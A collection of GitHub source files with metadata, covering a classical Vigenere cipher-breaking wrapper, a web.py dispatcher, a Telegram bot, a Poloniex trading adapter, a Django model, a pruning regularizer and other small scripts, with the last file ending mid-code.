+{"seq_id": "33608427505", "text": "# Vigenere File Hack\n# Wrapper to use files for bruteforce hack\n\nimport argparse # https://docs.python.org/3/library/argparse.html\nimport textwrap # https://docs.python.org/3/library/textwrap.html\n\nimport vigenere_hack\n\n\ndef main():\n # Get and parse the arguments\n options = get_args()\n\n input_file = open(options.input_filename.name)\n ciphertext = input_file.read()\n input_file.close()\n\n try:\n hacked_message = vigenere_hack.hack_vigenere(ciphertext)\n if hacked_message is not None:\n print(\"Writing decrypted text to %s.\" % options.output_filename.name)\n\n output_file = open(options.output_filename.name, \"w\")\n output_file.write(hacked_message)\n output_file.close()\n else:\n print(\"Failed to hack encryption.\")\n except KeyboardInterrupt:\n print(\"\\n[+] Detected CTRL+C ... \")\n print(\"[+] Done\")\n\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"Vigenere File Hack\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=textwrap.dedent(\n \"\"\"Example:\n vigenere_file_hack.py -i input_filename.txt -o output_filename.txt\n \"\"\"\n ),\n )\n parser.add_argument(\n \"-i\",\n \"--input_filename\",\n action=\"store\",\n dest=\"input_filename\",\n type=argparse.FileType(\"r\"),\n help=\"Takes input from a file name of your choice\",\n )\n parser.add_argument(\n \"-o\",\n \"--output_filename\",\n action=\"store\",\n dest=\"output_filename\",\n type=argparse.FileType(\"w\"),\n help=\"Directs the output to a name of your choice\",\n )\n values = parser.parse_args()\n return values\n\n\n# main() function.\nif __name__ == \"__main__\":\n main()\n", "repo_name": "tymyrddin/scripts-classical-ciphers", "sub_path": "vigenere/vigenere_file_hack.py", "file_name": "vigenere_file_hack.py", "file_ext": "py", "file_size_in_byte": 1793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "vigenere_hack.hack_vigenere", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 34, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 36, "usage_type": "attribute"}, {"api_name": "textwrap.dedent", "line_number": 37, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 48, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "30797705864", "text": "#coding:utf-8\nimport requests\n\nwith open(\"link.txt\", \"r\") as f:\n count = 1\n for line in f.readlines():\n imgUrl = line.strip('\\n') #去掉列表中每一个元素的换行符\n #imgUrl = 'https://res.qxueyou.com/img/2020/09/02/'+line\n image_name = str(count) + '.PNG'\n print(image_name,imgUrl)\n count+=1\n\n imgresponse = requests.get(imgUrl, stream=True) #以流的方式打开\n image = imgresponse.content\n address=\"C:\\\\Users\\Administrator\\Desktop\\PMP\"+\"\\\\\"\n try:\n with open(address+image_name ,\"wb\") as jpg:\n jpg.write(image)\n except IOError:\n print(\"IO Error\\n\")\n finally:\n jpg.close\n\n\n", "repo_name": "yangle92/Exercise", "sub_path": "Spider/Download_PMP_ppt.py", "file_name": "Download_PMP_ppt.py", "file_ext": "py", "file_size_in_byte": 720, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "17660453250", "text": "'''\nCreated on Nov 1, 2009\n\n@author: jecortez\n'''\nimport web\n#from controllers import charts\nfrom controllers import workflow\n#from controllers import benchmark\n#from controllers import benchmarkQueries\n#from controllers import benchmarkMySQLQueries\n\n#web.config.debug = False\n\nurls = (\n '/(.*)', 'index'\n)\n\ncontrollers = {'workflow':workflow\n #'charts':charts,\n #'benchmark':benchmark,\n #'benchmarkQueries':benchmarkQueries, \n #'benchmarkMySQLQueries':benchmarkMySQLQueries\n }\n\napp = web.application(urls, globals())\n\n\noptions = {\"render_plain\": web.template.render('views/'),\n \"render\": web.template.render('views/', base='layout'),\n \"dbhost\": \"bass02\",\n \"dbname\": \"pegasusLigoCombined2\",\n \"dbeventtable\": \"netlogger\"\n }\n\nclass index:\n def GET(self, query):\n query = str(web.webapi.ctx.path)\n \n #strip trailing /'s\n if query[-1] == \"/\":\n query = query[:-1]\n \n splitQuery = query.split(\"/\", 2)\n controller = splitQuery[1]\n action=\"\"\n if len(splitQuery)>2:\n action = splitQuery[2]\n controllerClass=controllers[controller]\n return controllerClass.invokeAction(action, options)\n def POST(self, query):\n return self.GET(query)\n\n#if __name__ == \"__main__\": app.run()\napplication = web.application(urls, globals()).wsgifunc()\n", "repo_name": "elainenaomi/stampedewebapi", "sub_path": "WebApi-Mongo/trunk/dispatcher.py", "file_name": "dispatcher.py", "file_ext": "py", "file_size_in_byte": 1460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "controllers.workflow", "line_number": 19, "usage_type": "name"}, {"api_name": "web.application", "line_number": 26, "usage_type": "call"}, {"api_name": "web.template.render", "line_number": 29, "usage_type": "call"}, {"api_name": "web.template", "line_number": 29, "usage_type": "attribute"}, {"api_name": "web.template.render", "line_number": 30, "usage_type": "call"}, {"api_name": "web.template", "line_number": 30, "usage_type": "attribute"}, {"api_name": "web.webapi", "line_number": 38, "usage_type": "attribute"}, {"api_name": "web.application", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "70334083929", "text": "import configparser\nimport db_ops\nimport telebot\nfrom telebot import types\n\nconfig = configparser.ConfigParser()\nconfig.read('balde.conf')\n\nTOKEN = config['BALDE']['TOKEN']\nbot = telebot.TeleBot(TOKEN)\nchannelid = config['BALDE']['CHANNELID']\n\nbutton2 = types.InlineKeyboardMarkup()\nbutton_ask = types.InlineKeyboardButton('Eu quero!', callback_data=\"/quero\")\nbutton2.row(button_ask)\n\nposts = db_ops.selectbigger('Balde', 'days', 0)\nfor post in posts:\n days_left = post[4]-1\n if days_left == 0:\n desc = '{}\\nPrazo expirado.'.format(post[3])\n bot.edit_message_caption(desc, channelid, post[1], parse_mode='HTML')\n bot.unpin_chat_message(channelid, post[1])\n elif int(post[5]) > 0:\n desc = '{}\\n{} tem {} dias para buscar.'.format(post[3], post[5], post[6], days_left)\n bot.edit_message_caption(desc, channelid, post[1], parse_mode='HTML')\n else:\n desc = '{}\\nDias restantes no balde: {}'.format(post[3], days_left)\n bot.edit_message_caption(desc, channelid, post[1], parse_mode='HTML', reply_markup=button2)\n db_ops.update('Balde', 'days', days_left, 'post', post[1])\n", "repo_name": "GabrielRF/CalangoHC-Balde", "sub_path": "count_day.py", "file_name": "count_day.py", "file_ext": "py", "file_size_in_byte": 1161, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}, {"api_name": "telebot.TeleBot", "line_number": 10, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardMarkup", "line_number": 13, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 13, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 14, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 14, "usage_type": "name"}, {"api_name": "db_ops.selectbigger", "line_number": 17, "usage_type": "call"}, {"api_name": "db_ops.update", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "20778919138", "text": "import timeit\r\nimport time\r\nimport random\r\nfrom prettytable import PrettyTable\r\n\r\ndef is_sorted(data) -> bool:\r\n return all(data[i] <= data[i + 1] for i in range(len(data) - 1))\r\n\r\ndef bogosort(data) -> list:\r\n while not is_sorted(data):\r\n random.shuffle(data)\r\n return data\r\n\r\nmult= [10, 100, 1000, 10000, 100000]\r\ntemps = []\r\nfor i in range(len(mult)):\r\n a = []\r\n for j in range(mult[i]):\r\n a.append(random.randint(-1000,1000))\r\n temps.append(timeit.timeit(\"bogosort(a)\",setup=\"from __main__ import bogosort, a\", number=1))\r\n \r\ntable= PrettyTable([\"Nombre d'éléments\", \"Temps de tri\"], padding_width=5)\r\ntable.title = \"Quantum Bogosort\"\r\nfor k in range(len(mult)):\r\n table.add_row([mult[k], temps[k]]) #notation scientifique a 3chiffres après la virgule\r\ntable.align[\"Nombre d'éléments\"] = \"l\"\r\ntable.align[\"Temps de tri\"] = \"r\"\r\n\r\nprint(table)\r\n", "repo_name": "BeowolfK/PEIP", "sub_path": "rapid_sort.py", "file_name": "rapid_sort.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "random.shuffle", "line_number": 11, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 19, "usage_type": "call"}, {"api_name": "timeit.timeit", "line_number": 20, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "21743900235", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom .regularizer import _Regularizer\n\n\nclass Conv2dWithMask(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1, bias=True):\n\n super(Conv2dWithMask, self).__init__(\n in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, groups=groups, bias=bias)\n\n self.test_mask = None\n self.p_mask = 1.0\n self.frequency = 16\n\n def forward(self, input):\n if self.training:\n self.frequency -= 1\n if self.frequency == 0:\n sample = np.random.binomial(n=1, p=self.p_mask, size=self.out_channels)\n param = self.weight\n l1norm = param.detach().view(param.size(0), -1).norm(p=1, dim=1)\n mask = torch.tensor(sample)\n mask = mask.expand(param.size(1) * param.size(2) * param.size(3), param.size(0)).t().contiguous()\n mask = mask.view(self.weight.shape).to(param.device)\n mask = mask.type(param.type())\n masked_weights = self.weight * mask\n masked_l1norm = masked_weights.detach().view(param.size(0), -1).norm(p=1, dim=1)\n pruning_factor = (masked_l1norm.sum() / l1norm.sum()).item()\n pruning_factor = max(0.2, pruning_factor)\n weight = masked_weights / pruning_factor\n self.frequency = 16\n else:\n weight = self.weight\n else:\n weight = self.weight\n return F.conv2d(input, weight, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n\n# replaces all conv2d layers in target`s model with 'Conv2dWithMask'\ndef replace_conv2d(container):\n for name, module in container.named_children():\n if (isinstance(module, nn.Conv2d)):\n print(\"replacing: \", name)\n new_module = Conv2dWithMask(in_channels=module.in_channels,\n out_channels=module.out_channels,\n kernel_size=module.kernel_size, padding=module.padding,\n stride=module.stride, bias=module.bias)\n setattr(container, name, new_module)\n replace_conv2d(module)\n\n\nclass DropFilterRegularizer(_Regularizer):\n def __init__(self, name, model, reg_regims, threshold_criteria=None):\n super().__init__(name, model, reg_regims, threshold_criteria)\n replace_conv2d(model)\n", "repo_name": "IntelLabs/distiller", "sub_path": "distiller/regularization/drop_filter.py", "file_name": "drop_filter.py", "file_ext": "py", "file_size_in_byte": 2674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4246, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.nn.Conv2d", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.random.binomial", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "regularizer._Regularizer", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "16950126377", "text": "# -*- coding: utf-8 -*-\nimport operator\nfrom functools import partial\nfrom logging import getLogger\nfrom typing import Callable\nfrom typing import Dict\nfrom moneybot.clients import Poloniex\nfrom moneybot.market.adapters import MarketAdapter\nfrom moneybot.market.history import MarketHistory\nfrom moneybot.market.state import MarketState\nfrom moneybot.strategy import ProposedTrade\n\n\nlogger = getLogger(__name__)\n\n\nclass LiveMarketAdapter(MarketAdapter):\n\n def __init__(\n self,\n market_history: MarketHistory,\n fiat: str,\n ) -> None:\n self.polo = Poloniex.get_client()\n self.market_history = market_history\n self.balances = self.get_balances()\n self.fiat = fiat\n\n def get_balances(self) -> Dict[str, float]:\n bals = self.polo.returnCompleteBalances()\n all_balances = {}\n for coin, bal, in bals.items():\n avail = float(bal['available'])\n if avail > 0:\n all_balances[coin] = avail\n return all_balances\n\n def execute(\n self,\n proposed_trade: ProposedTrade,\n ) -> Dict[str, float]:\n self._place_order(proposed_trade, self.market_state)\n return self.get_balances()\n\n '''\n Private methods\n '''\n\n def _adjust(\n self,\n val: float,\n operator: Callable,\n tweak: float = 0.001,\n ) -> float:\n '''\n Pass in `operator.__add__`\n or `operator.__sub__`\n to move `val` up or down by `tweak`.\n '''\n return operator(val, (val * tweak))\n\n def _adjust_up(self, val: float, **kwargs) -> float:\n return self._adjust(val, operator.__add__, **kwargs)\n\n def _adjust_down(self, val: float, **kwargs) -> float:\n return self._adjust(val, operator.__sub__, **kwargs)\n\n def _proposed_trade_measurement(\n self,\n direction: str,\n market: str,\n price: float,\n amount: float,\n order_status: str,\n ) -> Dict:\n return {\n 'measurement': 'proposedTrade',\n 'tags': {\n 'order_status': order_status,\n },\n 'fields': {\n 'direction': direction,\n 'market': market,\n 'price': price,\n 'amount': amount,\n }\n }\n\n def _purchase_helper(\n self,\n direction: str,\n market: str,\n price: float,\n amount: float,\n purchase_fn: Callable,\n adjust_fn: Callable,\n ) -> Dict:\n make_measurement = partial(self._proposed_trade_measurement,\n direction, market, price, amount)\n try:\n res = purchase_fn(\n market,\n price,\n amount,\n # Cancel order if not fulfilled in entirity at this price\n orderType='fillOrKill',\n )\n measurement = make_measurement('filled')\n logger.debug(str(measurement))\n # If we can't fill the order at this price,\n except:\n measurement = make_measurement('killed')\n logger.debug(str(measurement))\n # recursively again at a (higher / lower) price\n adjusted_price = adjust_fn(price)\n return self._purchase_helper(\n direction,\n market,\n adjusted_price,\n amount,\n purchase_fn,\n adjust_fn\n )\n return res\n\n def _place_order(\n self,\n proposed_trade: ProposedTrade,\n market_state: MarketState,\n ) -> Dict:\n\n # in the language of poloniex,\n # buying a market's quote currency is a \"buy\"\n if proposed_trade.buy_coin == proposed_trade.market_quote_currency:\n return self._purchase_helper(\n 'buy',\n proposed_trade.market_name,\n proposed_trade.market_price,\n proposed_trade.buy_amount,\n self.polo.buy,\n # We try to buy low,\n # But don't always get to,\n # so we adjust up if we must.\n self._adjust_up,\n )\n\n # in the language of poloniex,\n # buying a market's base currency is a \"sell\"\n elif proposed_trade.buy_coin == proposed_trade.market_base_currency:\n return self._purchase_helper(\n 'sell',\n proposed_trade.market_name,\n 
proposed_trade.market_price,\n proposed_trade.sell_amount,\n self.polo.sell,\n # We try to sell high,\n # But don't always get to,\n # so we adjust down if we must.\n self._adjust_down,\n )\n\n return {}\n", "repo_name": "JakeHartnell/moneybot", "sub_path": "moneybot/market/adapters/live.py", "file_name": "live.py", "file_ext": "py", "file_size_in_byte": 4800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "moneybot.market.adapters.MarketAdapter", "line_number": 17, "usage_type": "name"}, {"api_name": "moneybot.market.history.MarketHistory", "line_number": 21, "usage_type": "name"}, {"api_name": "moneybot.clients.Poloniex.get_client", "line_number": 24, "usage_type": "call"}, {"api_name": "moneybot.clients.Poloniex", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 29, "usage_type": "name"}, {"api_name": "moneybot.strategy.ProposedTrade", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 52, "usage_type": "name"}, {"api_name": "operator.__add__", "line_number": 63, "usage_type": "attribute"}, {"api_name": "operator.__sub__", "line_number": 66, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 96, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 98, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 97, "usage_type": "name"}, {"api_name": "moneybot.strategy.ProposedTrade", "line_number": 128, "usage_type": "name"}, {"api_name": "moneybot.market.state.MarketState", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 130, "usage_type": "name"}]}
+{"seq_id": "6215218856", "text": "import json, sys\nimport time\nfrom functools import reduce\n\n# data.py存储着从vtbs.moe获取的主播数据\nfrom data.data import DATA\n\n# 原始文件路径\nsrc_file_path = \"data/ori_data.json\"\n# 目标文件路径\ntgt_file_path = \"data/data.py\"\n\ndef delete_duplicate(data):\n func = lambda x, y: x + [y] if y not in x else x\n data = reduce(func, [[], ] + data)\n return data\n\n# 最新的vtb数据\nwith open(src_file_path, \"r\", encoding=\"utf8\") as f:\n ori_data = json.load(f)\n\nprint(\"len(ori_data)=\" + str(len(ori_data)))\nprint(\"len(DATA)=\" + str(len(DATA)))\n\n# 先合并 再去重\n# new_data = DATA + ori_data\n# print(\"len(new_data)=\" + str(len(new_data)))\n\n# DATA = delete_duplicate(new_data)\n# print(\"duplicate len(DATA)=\" + str(len(DATA)))\n\n# 遍历 判断是否存在 后 尾部插入\nnum = 0\nfor temp_json in ori_data:\n if temp_json in DATA:\n continue\n else:\n # 追加入json\n DATA.append(temp_json)\n num += 1\n # print(temp_json)\n\nprint(\"add total num=\" + str(num))\n\nprint(\"after len(DATA)=\" + str(len(DATA)))\n\n# 数据写入本地喵\nwith open(tgt_file_path, 'w', encoding=\"utf-8\") as file_object:\n file_object.write(\"DATA=\" + json.dumps(DATA, ensure_ascii=False))\nfile_object.close()\nprint(\"write \" + tgt_file_path + \" over\")\n", "repo_name": "Ikaros-521/get_bili_medal_list", "sub_path": "update_data.py", "file_name": "update_data.py", "file_ext": "py", "file_size_in_byte": 1290, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "data.data", "line_number": 15, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 15, "usage_type": "call"}, {"api_name": "data.data", "line_number": 16, "usage_type": "name"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "data.data.DATA", "line_number": 23, "usage_type": "argument"}, {"api_name": "data.data.DATA", "line_number": 35, "usage_type": "name"}, {"api_name": "data.data.DATA.append", "line_number": 39, "usage_type": "call"}, {"api_name": "data.data.DATA", "line_number": 39, "usage_type": "name"}, {"api_name": "data.data.DATA", "line_number": 45, "usage_type": "argument"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "data.data.DATA", "line_number": 49, "usage_type": "argument"}]}
+{"seq_id": "42489963026", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nQSDsan: Quantitative Sustainable Design for sanitation and resource recovery systems\n\nThis module is developed by:\n Yalin Li \n\nThis module is under the University of Illinois/NCSA Open Source License.\nPlease refer to https://github.com/QSD-Group/QSDsan/blob/master/LICENSE.txt\nfor license details.\n'''\n\n\n# %%\n\nfrom ._units_of_measure import parse_unit\nfrom .utils.loading import load_data, data_path\ndata_path += '_impact_indicator.tsv'\n\n__all__ = ('ImpactIndicator', )\n\n\nclass ImpactIndicator:\n '''\n To handle different impact indicators in life cycle assessment.\n \n Parameters\n ----------\n ID : str\n ID of the ImpactIndicator.\n synonym : str\n Alternative ID of the ImpactIndicator.\n method : str\n Impact assessment method, e.g., 'TRACI'.\n category : str\n Category of the ImpactIndicator, e.g., 'human healt'.\n unit : str\n Unit of the ImpactIndicator, e.g., 'kg CO2-eq'.\n description : str\n Supplementary explanation.\n \n '''\n \n _indicators = {}\n _default_data = None\n \n __slots__ = ('_ID', '_synonym', '_method', '_category', '_unit', '_ureg_unit',\n '_unit_remaining', '_description')\n\n def __init__(self, ID, synonym='', method='', category='', unit='', description=''):\n \n if ID in ImpactIndicator._indicators.keys():\n raise ValueError(f'The ID \"{ID}\" is currently in use.')\n self._ID = ID\n self._unit = str(unit)\n self._ureg_unit, self._unit_remaining = parse_unit(unit)\n self._method = method\n self._category = category\n self._description = description\n ImpactIndicator._indicators[ID] = self\n if synonym and str(synonym) != 'nan':\n self.set_synonym(synonym)\n\n def __repr__(self):\n return f''\n\n def show(self):\n '''Show basic information about this indicator.'''\n if self.unit:\n info = f'ImpactIndicator: {self.ID} as {self.unit}'\n else:\n info = f'ImpactIndicator: {self.ID}'\n line = '\\n Synonyms : '\n synonyms = self.get_synonym()\n if synonyms:\n for synonym in synonyms[:-1]:\n line += synonym + '; '\n line += synonyms[-1]\n if len(line) > 40: line = line[:40] + '...'\n info += line\n info += f'\\n Method : {self.method or None}'\n info += f'\\n Category : {self.category or None}'\n line = f'\\n Description: {self.description or None}'\n if len(line) > 40: line = line[:40] + '...'\n info += line\n print(info)\n \n _ipython_display_ = show\n \n def set_synonym(self, synonym):\n '''\n Give the indicator a synonym.\n\n Parameters\n ----------\n ID : str\n Original ID.\n synonym : str\n New synonym of the indicator.\n\n '''\n dct = ImpactIndicator._indicators\n if synonym in dct.keys() and dct[synonym] is not self:\n raise ValueError(f'The synonym \"{synonym}\" already in use.')\n else:\n dct[synonym] = self\n \n def get_synonym(self):\n '''Return all synonyms of the indicator as a list.'''\n return tuple(i for i, j in ImpactIndicator._indicators.items()\n if j==self and i != self.ID)\n\n\n @classmethod\n def load_default_indicators(cls):\n '''Load all default indicators as in /data/_impact_indicator.xlsx.'''\n if cls._default_data is not None:\n data = cls._default_data\n else: data = load_data(path=data_path)\n for indicator in data.index:\n if indicator in cls._indicators.keys():\n continue\n else:\n new = cls.__new__(cls)\n new.__init__(ID=indicator,\n synonym=data.loc[indicator]['synonym'],\n unit=data.loc[indicator]['unit'],\n method=data.loc[indicator]['method'],\n category=data.loc[indicator]['category'],\n 
description=data.loc[indicator]['description'])\n cls._indicators[indicator] = new\n cls._default_data = data\n\n\n @classmethod\n def get_indicator(cls, ID):\n '''Get an indicator by its ID.'''\n return cls._indicators[ID]\n\n @classmethod\n def get_all_indicators(cls):\n '''Get all defined indicators.'''\n return tuple(i for i in set([i for i in ImpactIndicator._indicators.values()]))\n\n @property\n def ID(self):\n '''ID of the impact indicator.''' \n return self._ID\n\n @property\n def unit(self):\n '''Unit of the impact indicator.''' \n return self._unit\n @unit.setter\n def unit(self, i):\n self._unit = str(i)\n self._ureg_unit, self._unit_remaining = parse_unit(i)\n\n @property\n def method(self):\n '''Impact assessment method of the indicator.''' \n return self._method\n @method.setter\n def method(self, i):\n self._method = i\n\n @property\n def category(self):\n '''Impact category of the indicator.''' \n return self._category\n @category.setter\n def category(self, i):\n self._category = i\n\n @property\n def description(self):\n '''Description of the impact indicator.''' \n return self._description\n @description.setter\n def description(self, i):\n self._description = i\n\n\n\n\n# ImpactIndicator.load_default_indicators()\n\n\n\n", "repo_name": "stetsonrowles/QSDsan", "sub_path": "qsdsan/_impact_indicator.py", "file_name": "_impact_indicator.py", "file_ext": "py", "file_size_in_byte": 5646, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "32", "api": [{"api_name": "utils.loading.data_path", "line_number": 20, "usage_type": "name"}, {"api_name": "_units_of_measure.parse_unit", "line_number": 58, "usage_type": "call"}, {"api_name": "utils.loading.load_data", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.loading.data_path", "line_number": 121, "usage_type": "name"}, {"api_name": "_units_of_measure.parse_unit", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "2001844974", "text": "\"\"\"Menu options models.\"\"\"\n\n# Django\nfrom django.db import models\nfrom django.db.backends.base.operations import BaseDatabaseOperations\nfrom django.utils.translation import gettext_lazy as _\n\n# Backend test\nfrom backend_test.menus.models.meals import Meal\nfrom backend_test.menus.models.menus import Menu\nfrom backend_test.utils.models import TimeStampedModel\n\n\nclass MenuOption(TimeStampedModel):\n \"\"\"\n Menu option model class.\n\n Extend from TimeStampedModel for default timestamp fields. Additionally\n add some extra fields.\n \"\"\"\n\n menu = models.ForeignKey(\n Menu,\n verbose_name=_(\"menu\"),\n on_delete=models.PROTECT,\n related_name=\"menu_options\",\n related_query_name=\"menu_option\",\n )\n meal = models.ForeignKey(\n Meal,\n verbose_name=_(\"meal\"),\n on_delete=models.PROTECT,\n related_name=\"menu_options\",\n related_query_name=\"menu_option\",\n )\n option = models.PositiveSmallIntegerField(\n _(\"option\"),\n default=BaseDatabaseOperations.integer_field_ranges[\n models.PositiveSmallIntegerField.__name__\n ][1],\n help_text=_(\"Option number in menu (useful for ordering).\"),\n )\n\n class Meta(TimeStampedModel.Meta):\n \"\"\"Meta options.\"\"\"\n\n verbose_name = _(\"menu option\")\n verbose_name_plural = _(\"menu options\")\n constraints = [\n models.UniqueConstraint(\n fields=[\"menu\", \"meal\"],\n name=\"menu_option_menu_meal_unique\",\n )\n ]\n ordering = [\"option\", \"-created\"]\n db_table = \"menus_menu_option\"\n\n def __str__(self) -> str:\n \"\"\"Return instance string representation\"\"\"\n return f\"{self.option}\"\n", "repo_name": "atahualpasf/backend-test-silva", "sub_path": "cornershop-backend-test/backend_test/menus/models/menu_options.py", "file_name": "menu_options.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "backend_test.utils.models.TimeStampedModel", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 22, "usage_type": "call"}, {"api_name": "backend_test.menus.models.menus.Menu", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.PROTECT", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 29, "usage_type": "call"}, {"api_name": "backend_test.menus.models.meals.Meal", "line_number": 30, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models.PROTECT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.PositiveSmallIntegerField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.backends.base.operations.BaseDatabaseOperations.integer_field_ranges", "line_number": 38, "usage_type": "attribute"}, {"api_name": 
"django.db.backends.base.operations.BaseDatabaseOperations", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.PositiveSmallIntegerField", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 41, "usage_type": "call"}, {"api_name": "backend_test.utils.models.TimeStampedModel.Meta", "line_number": 44, "usage_type": "attribute"}, {"api_name": "backend_test.utils.models.TimeStampedModel", "line_number": 44, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 47, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models.UniqueConstraint", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "24813916432", "text": "import argparse\nfrom glob import glob\nimport math\nimport os\nimport subprocess\n\nimport cv2\nfrom matplotlib import pyplot as plt\nimport torch\nimport numpy as np\nfrom decord import VideoReader\nfrom omegaconf import OmegaConf\n\nfrom pytorch_grad_cam import ActivationsAndGradients\n\nimport models\n\ndef load_model(url, map_location='cpu'):\n if url.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n url, map_location=map_location)\n else:\n checkpoint = torch.load(url, map_location=map_location)\n return checkpoint\n\n\ndef make_divisible(x, divisor=32):\n # Returns x evenly divisible by divisor\n return math.ceil(x / divisor) * divisor\n\n\nclass Detector:\n\n def __init__(self, weights, device='cpu', img_size=640) -> None:\n self.device = device\n self.img_size = img_size\n self.model = load_model(weights, device)['model'].float().fuse().eval()\n\n def __call__(self, imgs):\n h0, w0 = imgs[0].shape[:2]\n r = self.img_size / max(h0, w0) # resize image to img_size\n w, h = make_divisible(w0 * r), make_divisible(h0 * r)\n if r != 1:\n interp = cv2.INTER_AREA if r < 1 else cv2.INTER_LINEAR\n imgs = [cv2.resize(img, (w, h), interpolation=interp) for img in imgs]\n scale = torch.tensor([w0 / w, h0 / h] * 2)\n img = np.stack(imgs).transpose(0, 3, 1, 2)\n img = np.ascontiguousarray(img)\n img = torch.from_numpy(img).to(self.device, non_blocking=True)\n img = img.float() / 255.\n\n # Inference\n pred = self.model(img)[0]\n\n # Process detections\n index = pred[..., 4].max(1).indices\n return pred[range(index.size(0)), index, :4].cpu().mul(scale).numpy()\n\n\nclass FaceVideo:\n\n def __init__(self, src, detector, n_frames=16, img_size=224) -> None:\n self.src = src\n self.n_frames = n_frames\n if isinstance(img_size, int):\n img_size = (img_size, img_size)\n self.img_size = img_size\n self.detector = 